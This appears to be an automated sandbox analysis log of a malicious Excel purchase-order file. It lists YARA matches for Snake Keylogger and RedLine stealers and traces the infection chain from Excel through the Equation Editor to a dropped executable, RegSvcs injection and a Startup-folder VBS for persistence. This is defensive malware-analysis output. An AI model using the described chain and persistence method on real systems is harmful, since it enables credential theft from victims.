                  Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@13/16@20/4
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010637B5 GetLastError,FormatMessageW,8_2_010637B5
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010510BF AdjustTokenPrivileges,CloseHandle,8_2_010510BF
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,8_2_010516C3
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013910BF AdjustTokenPrivileges,CloseHandle,11_2_013910BF
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_013916C3
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,8_2_010651CD
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_00B9A67C
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,5_2_00B8648E
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,5_2_00B142A2
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Orden de compra 0001-00255454.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR71F4.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Orden de compra 0001-00255454.xlam.xlsxVirustotal: Detection: 55%
                  Source: Orden de compra 0001-00255454.xlam.xlsxReversingLabs: Detection: 68%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe
                  Source: C:\Users\user\AppData\Roaming\negrett.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exeJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: Orden de compra 0001-00255454.xlam.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.887613272.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp
